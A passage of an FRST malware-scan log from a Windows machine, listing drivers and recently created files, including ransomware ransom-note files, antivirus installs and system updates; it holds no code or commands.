R1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [30752 2013-05-29] (EldoS Corporation)
S1 FileDisk; No ImagePath
R3 hcwE5bda; C:\Windows\system32\drivers\hcwE5bda.sys [950384 2013-03-05] (Hauppauge Computer Work, Inc.)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-23] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2014-05-12] (Malwarebytes Corporation)
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2014-02-04] ()
R1 RawDisk3; C:\Windows\system32\drivers\rawdsk3.sys [32912 2014-08-12] (EldoS Corporation)
R3 SensorsSimulatorDriver; C:\Windows\system32\DRIVERS\WUDFRd.sys [198656 2012-07-25] (Microsoft Corporation)
R0 SysCow; C:\Windows\System32\drivers\syscowad64v.sys [164848 2010-05-23] (Sonic Solutions)
S1 celffluo; \??\C:\Windows\system32\drivers\celffluo.sys [X]
S1 evtuidgg; \??\C:\Windows\system32\drivers\evtuidgg.sys [X]
S1 hthhwdkn; \??\C:\Windows\system32\drivers\hthhwdkn.sys [X]
S3 PCDSRVC{D3412D80-CF3B4A27-06020200}_0; \??\c:\program files\my dell\pcdsrvc_x64.pkms [X]
S1 pqgeqfex; \??\C:\Windows\system32\drivers\pqgeqfex.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)
2014-09-23 13:34 - 2014-09-23 13:35 - 00029241 _____ () C:\Users\Kulle\Desktop\FRST.txt
2014-09-23 13:33 - 2014-09-23 13:34 - 00000000 ____D () C:\FRST
2014-09-23 13:31 - 2014-09-23 13:31 - 02106368 _____ (Farbar) C:\Users\Kulle\Desktop\FRST64.exe
2014-09-23 13:04 - 2014-09-23 13:04 - 00015872 _____ () C:\Users\Kulle\Desktop\DECRYPTED-file.xls
2014-09-23 03:54 - 2014-09-23 03:54 - 00000000 ___RD () C:\Users\Kulle\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
2014-09-23 02:43 - 2014-09-23 12:48 - 00003208 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001
2014-09-23 02:17 - 2014-09-23 02:17 - 00000000 ____D () C:\Users\Kulle\AppData\Roaming\AVAST Software
2014-09-23 02:14 - 2014-09-23 02:14 - 00001928 _____ () C:\Users\Public\Desktop\avast! Free Antivirus.lnk
2014-09-23 02:14 - 2014-09-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast
2014-09-23 02:13 - 2014-09-23 02:17 - 00004182 _____ () C:\Windows\System32\Tasks\avast! Emergency Update
2014-09-23 02:13 - 2014-09-23 02:13 - 00427360 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-09-23 02:13 - 2014-09-23 02:12 - 01041168 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSnx.sys
2014-09-23 02:13 - 2014-09-23 02:12 - 00307344 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-09-23 02:13 - 2014-09-23 02:12 - 00224896 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-09-23 02:13 - 2014-09-23 02:12 - 00093568 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr2.sys
2014-09-23 02:13 - 2014-09-23 02:12 - 00092008 _____ (AVAST Software) C:\Windows\system32\Drivers\aswStm.sys
2014-09-23 02:13 - 2014-09-23 02:12 - 00079184 _____ (AVAST Software) C:\Windows\system32\Drivers\aswMonFlt.sys
2014-09-23 02:13 - 2014-09-23 02:12 - 00065776 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-09-23 02:13 - 2014-09-23 02:12 - 00029208 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-09-23 02:12 - 2014-09-23 02:12 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-09-23 02:11 - 2014-09-23 02:11 - 00000000 ____D () C:\Program Files\AVAST Software
2014-09-23 02:10 - 2014-09-23 02:10 - 04862664 _____ (AVAST Software) C:\Users\Kulle\Downloads\avast_free_antivirus_setup_online.exe
2014-09-22 18:28 - 2014-09-22 18:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2014-09-22 18:27 - 2014-09-22 18:27 - 00000000 ____D () C:\Users\Kulle\AppData\Local\NVIDIA
2014-09-22 18:16 - 2014-07-02 10:44 - 00609240 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2014-09-22 18:14 - 2014-08-29 22:48 - 10115072 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2014-09-22 18:14 - 2014-08-29 22:47 - 02885632 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-09-22 18:14 - 2014-08-29 22:46 - 02306560 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-09-22 18:14 - 2014-08-29 21:05 - 08858112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2014-09-22 18:14 - 2014-08-29 21:04 - 02416128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-09-22 18:14 - 2014-08-29 21:03 - 02037760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-09-22 18:14 - 2014-08-01 15:08 - 00388729 _____ () C:\Windows\system32\ApnDatabase.xml
2014-09-22 18:14 - 2014-07-24 06:50 - 00447296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBHUB3.SYS
2014-09-22 18:14 - 2014-07-16 16:28 - 00027648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sscore.dll
2014-09-22 18:14 - 2014-07-16 15:59 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\srvsvc.dll
2014-09-22 18:14 - 2014-07-16 15:59 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\sscore.dll
2014-09-22 18:14 - 2014-07-11 23:45 - 01549824 _____ (Microsoft Corporation) C:\Windows\system32\msdtctm.dll
2014-09-22 18:14 - 2014-07-11 21:36 - 00674304 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2014-09-22 18:14 - 2014-07-11 21:36 - 00211456 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2014-09-22 18:14 - 2014-07-11 21:34 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2014-09-22 18:14 - 2014-07-11 21:34 - 00250368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2014-09-22 18:14 - 2014-06-27 23:57 - 01341952 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2014-09-22 18:14 - 2014-06-27 19:23 - 01126400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2014-09-22 18:14 - 2014-06-12 16:34 - 00754176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\actxprxy.dll
2014-09-22 18:14 - 2014-06-12 16:29 - 02146304 _____ (Microsoft Corporation) C:\Windows\system32\actxprxy.dll
2014-09-22 18:11 - 2014-09-22 18:11 - 00002182 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware Premium.txt
2014-09-22 18:07 - 2014-09-22 18:07 - 17291904 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam_premium.exe
2014-09-22 16:55 - 2014-09-22 16:55 - 00000000 ____D () C:\Program Files\Common Files\DESIGNER
2014-09-22 16:49 - 2014-09-23 12:48 - 00003342 _____ () C:\Windows\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001
2014-09-22 16:44 - 2014-09-22 16:44 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-22 16:41 - 2014-07-15 15:51 - 00071168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hdaudbus.sys
2014-09-22 16:24 - 2014-08-28 04:34 - 00059400 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-09-22 16:24 - 2014-08-27 23:05 - 00630272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2014-09-22 16:24 - 2014-08-27 23:05 - 00128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2014-09-22 16:24 - 2014-08-27 23:05 - 00086528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2014-09-22 16:24 - 2014-08-27 23:05 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2014-09-22 16:24 - 2014-08-27 23:02 - 00040448 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-09-22 16:24 - 2014-08-27 23:01 - 03285504 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-09-22 16:24 - 2014-08-27 23:01 - 01623552 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-09-22 16:24 - 2014-08-27 23:01 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-09-22 16:24 - 2014-08-27 23:01 - 00253440 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
2014-09-22 16:24 - 2014-08-27 23:01 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\storewuauth.dll
2014-09-22 16:24 - 2014-08-27 23:01 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-09-22 16:24 - 2014-08-27 23:01 - 00100352 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-09-22 16:24 - 2014-08-27 23:01 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\wuaext.dll
2014-09-22 16:23 - 2014-08-20 16:40 - 00732880 _____ (Microsoft Corporation) C:\Windows\system32\NotificationUI.exe
2014-09-22 16:23 - 2014-08-20 10:05 - 00694784 _____ (Microsoft Corporation) C:\Windows\system32\WSShared.dll
2014-09-22 16:23 - 2014-08-20 10:05 - 00198656 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.dll
2014-09-22 16:23 - 2014-08-20 10:05 - 00163840 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2014-09-22 16:23 - 2014-08-20 10:02 - 00567808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSShared.dll
2014-09-22 16:23 - 2014-08-20 10:02 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2014-09-22 16:23 - 2014-06-24 00:35 - 00010450 _____ () C:\Windows\system32\autoconfig.cab
2014-09-22 16:23 - 2014-06-23 23:40 - 00125952 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2014-09-22 16:23 - 2014-03-24 16:42 - 00305152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wusa.exe
2014-09-22 16:23 - 2014-03-24 15:56 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\wusa.exe
2014-09-22 16:13 - 2014-09-22 16:13 - 00456864 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-09-22 16:02 - 2014-06-10 15:44 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-09-22 16:02 - 2014-06-10 15:43 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-09-22 16:01 - 2014-06-04 18:12 - 00678600 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2014-09-22 16:01 - 2014-06-03 16:12 - 00536776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2014-09-22 15:45 - 2014-07-31 16:40 - 01287680 _____ (Microsoft Corporation) C:\Windows\system32\schedsvc.dll
2014-09-22 15:45 - 2014-06-17 16:27 - 01440256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\osk.exe
2014-09-22 15:45 - 2014-06-17 16:24 - 01557504 _____ (Microsoft Corporation) C:\Windows\system32\osk.exe
2014-09-22 15:45 - 2014-06-12 18:57 - 01453400 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-09-22 15:45 - 2014-06-12 18:55 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2014-09-22 15:45 - 2014-05-02 22:47 - 03246592 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-09-22 15:45 - 2014-05-02 20:34 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\rdpudd.dll
2014-09-22 15:43 - 2014-03-28 01:23 - 19759104 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2014-09-22 15:43 - 2014-03-27 23:18 - 17562112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2014-09-22 15:19 - 2014-08-16 02:34 - 02239488 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-22 15:19 - 2014-08-16 02:34 - 01407488 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-22 15:19 - 2014-08-16 02:34 - 00915968 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll
2014-09-22 15:19 - 2014-08-16 02:34 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-22 15:19 - 2014-08-16 02:33 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-22 15:19 - 2014-08-16 02:33 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-22 15:19 - 2014-08-16 02:32 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-22 15:19 - 2014-08-16 02:32 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-22 15:19 - 2014-08-16 02:32 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-22 15:19 - 2014-08-16 02:32 - 01508864 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-22 15:19 - 2014-08-16 02:32 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-09-22 15:19 - 2014-08-16 02:32 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-22 15:19 - 2014-08-16 02:32 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-22 15:19 - 2014-08-16 02:32 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-22 15:19 - 2014-08-16 00:37 - 01766400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-09-22 15:19 - 2014-08-16 00:37 - 01180672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 13757440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-09-22 15:19 - 2014-08-16 00:36 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-09-22 15:19 - 2014-08-16 00:35 - 01440768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-09-22 15:18 - 2014-08-16 02:33 - 19280384 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-22 15:18 - 2014-08-16 00:36 - 14369280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-09-22 13:46 - 2014-09-22 13:46 - 00005100 _____ () C:\Users\Kulle\Desktop\Malwarebytes Anti-Malware.txt
2014-09-22 13:29 - 2014-09-23 12:52 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-22 13:29 - 2014-09-22 18:08 - 00001068 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-22 13:29 - 2014-09-22 18:08 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-22 13:29 - 2014-05-12 08:19 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-22 13:29 - 2014-05-12 08:19 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-22 13:29 - 2014-05-12 08:19 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-09-22 13:28 - 2014-09-22 18:08 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-22 13:28 - 2014-09-22 13:28 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-22 13:15 - 2014-09-22 13:15 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Kulle\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-22 02:31 - 2014-09-23 03:50 - 00003364 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-2997053151-1021370575-3583938921-1001
2014-09-22 02:31 - 2014-09-23 03:50 - 00003230 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-2997053151-1021370575-3583938921-1001
2014-09-22 02:16 - 2014-09-23 04:38 - 00004924 _____ () C:\Users\Kulle\Desktop\9-21.txt
2014-09-22 01:05 - 2014-09-22 13:47 - 00000000 __SHD () C:\ProgramData\USB Adapter Updater
2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.HTML
2014-09-21 23:47 - 2014-09-21 23:47 - 00008178 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.HTML
2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.TXT
2014-09-21 23:47 - 2014-09-21 23:47 - 00004134 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.TXT
2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Downloads\DECRYPT_INSTRUCTION.URL
2014-09-21 23:47 - 2014-09-21 23:47 - 00000254 _____ () C:\Users\Kulle\Documents\DECRYPT_INSTRUCTION.URL
2014-09-21 22:08 - 2014-09-21 22:08 - 00008178 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-09-21 22:08 - 2014-09-21 22:08 - 00008178 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.HTML
2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-09-21 22:08 - 2014-09-21 22:08 - 00004134 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.TXT
2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-09-21 22:08 - 2014-09-21 22:08 - 00000254 _____ () C:\Users\Kulle\AppData\DECRYPT_INSTRUCTION.URL
2014-09-21 19:11 - 2014-09-21 19:11 - 00008178 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-09-21 19:11 - 2014-09-21 19:11 - 00004134 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-09-21 19:11 - 2014-09-21 19:11 - 00000254 _____ () C:\Users\Kulle\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-09-21 17:50 - 2014-09-21 17:50 - 00001447 _____ () C:\Users\Kulle\Desktop\LiveBoost.lnk
2014-09-21 17:49 - 2014-08-12 23:38 - 00032912 _____ (EldoS Corporation) C:\Windows\system32\Drivers\rawdsk3.sys
2014-09-21 16:11 - 2014-09-23 02:11 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-09-21 12:51 - 2014-09-21 12:51 - 1944573530 _____ () C:\Windows\MEMORY.DMP
2014-09-21 12:51 - 2014-09-21 12:51 - 00296792 _____ () C:\Windows\Minidump\092114-38125-01.dmp
2014-09-19 04:05 - 2014-09-21 22:08 - 00000792 _____ () C:\Users\Kulle\Desktop\Frequent Pages Listed on New Tab.txt
2014-09-19 03:33 - 2014-05-29 16:31 - 00452608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SHCore.dll
2014-09-19 03:33 - 2014-05-29 16:03 - 00588288 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2014-09-19 03:33 - 2014-05-29 16:02 - 01281536 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-19 03:33 - 2014-05-29 16:02 - 00439808 _____ (Microsoft Corporation) C:\Windows\system32\lsm.dll
2014-09-19 03:27 - 2014-09-04 15:36 - 00755712 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-19 03:27 - 2014-09-02 18:49 - 00556544 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-19 03:27 - 2014-06-30 15:42 - 00394240 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2014-09-19 03:27 - 2014-06-30 15:42 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2014-09-19 03:16 - 2014-07-23 20:33 - 00875688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2014-09-19 03:16 - 2014-07-23 20:33 - 00869544 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2014-09-19 03:15 - 2014-06-02 15:33 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2014-09-19 03:10 - 2014-05-02 23:34 - 06974808 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-09-19 03:10 - 2014-05-02 23:33 - 01824808 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2014-09-19 03:10 - 2014-05-02 21:51 - 01408976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2014-09-19 03:10 - 2014-05-01 15:37 - 01023488 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2014-09-19 03:10 - 2014-04-29 15:32 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\Robocopy.exe
2014-09-19 03:10 - 2014-04-29 15:32 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Robocopy.exe
2014-09-19 03:10 - 2014-04-12 02:27 - 00172888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2014-09-19 03:10 - 2014-04-12 02:10 - 00578048 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-09-19 03:10 - 2014-04-12 02:09 - 01043968 _____ (Microsoft Corporation) C:\Windows\system32\usercpl.dll
2014-09-19 03:10 - 2014-04-12 02:08 - 00827904 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-19 03:10 - 2014-04-12 02:08 - 00318464 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2014-09-19 03:10 - 2014-04-12 00:23 - 00961536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usercpl.dll
2014-09-19 03:10 - 2014-04-12 00:23 - 00273920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2014-09-19 03:10 - 2014-04-12 00:22 - 00666624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2014-09-19 03:10 - 2014-03-10 20:25 - 00100184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2014-09-19 03:10 - 2014-03-10 17:41 - 00559104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\objsel.dll
2014-09-19 03:10 - 2014-03-10 17:38 - 00982016 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2014-09-19 03:10 - 2014-03-10 17:38 - 00684032 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2014-09-19 03:10 - 2014-03-10 17:38 - 00179712 _____ (Microsoft Corporation) C:\Windows\system32\dpapisrv.dll
2014-09-19 03:10 - 2014-03-10 17:38 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2014-09-19 03:10 - 2014-03-09 20:05 - 00668160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2014-09-19 03:10 - 2014-03-03 16:07 - 00570216 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2014-09-19 03:09 - 2014-04-12 02:09 - 00208896 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2014-09-19 03:09 - 2014-04-12 02:09 - 00094720 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-09-19 03:09 - 2014-04-12 02:07 - 00020480 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-09-19 03:09 - 2014-04-12 00:23 - 00178688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2014-09-19 03:09 - 2014-04-12 00:23 - 00076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-09-19 03:09 - 2014-04-12 00:22 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-09-19 03:09 - 2014-04-11 23:58 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\workerdd.dll
2014-09-19 03:09 - 2014-03-10 17:41 - 00323072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2014-09-19 03:09 - 2014-03-10 17:41 - 00038400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dimsroam.dll
2014-09-19 03:09 - 2014-03-10 17:39 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2014-09-19 03:09 - 2014-03-10 17:38 - 00419328 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-09-19 03:09 - 2014-03-10 17:38 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\dimsroam.dll
2014-09-19 03:09 - 2014-03-10 17:38 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2014-09-19 03:09 - 2014-03-09 18:27 - 00099840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2014-09-19 03:07 - 2014-08-22 23:47 - 04036096 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-09-19 03:07 - 2014-07-15 16:03 - 01300992 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-09-19 03:07 - 2014-07-11 19:36 - 01023488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2014-09-19 02:59 - 2014-05-29 15:24 - 00576512 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-09-19 02:58 - 2014-04-03 04:22 - 02233176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2014-09-19 02:53 - 2014-06-06 07:06 - 00596480 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-09-19 02:53 - 2014-06-06 03:17 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-09-19 02:53 - 2014-06-05 10:56 - 00112984 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-09-19 02:53 - 2014-06-05 10:29 - 00393216 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-09-19 02:52 - 2014-06-19 16:35 - 01312768 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-09-19 02:52 - 2014-06-19 15:24 - 00694272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll 2014-09-19 02:52 - 2014-06-05 06:11 - 00295424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll 2014-09-19 02:49 - 2014-08-09 01:29 - 00144896 _____ (Microsoft Corporation) C:\Windows\system32\tssdisai.dll 2014-09-19 02:48 - 2014-08-09 01:30 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe 2014-09-19 02:48 - 2014-03-06 17:47 - 01419264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll 2014-09-19 02:48 - 2014-03-06 17:08 - 01845760 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll 2014-09-19 02:46 - 2014-05-28 21:04 - 00094552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys 2014-09-19 02:46 - 2014-05-07 18:34 - 00328024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Classpnp.sys 2014-09-19 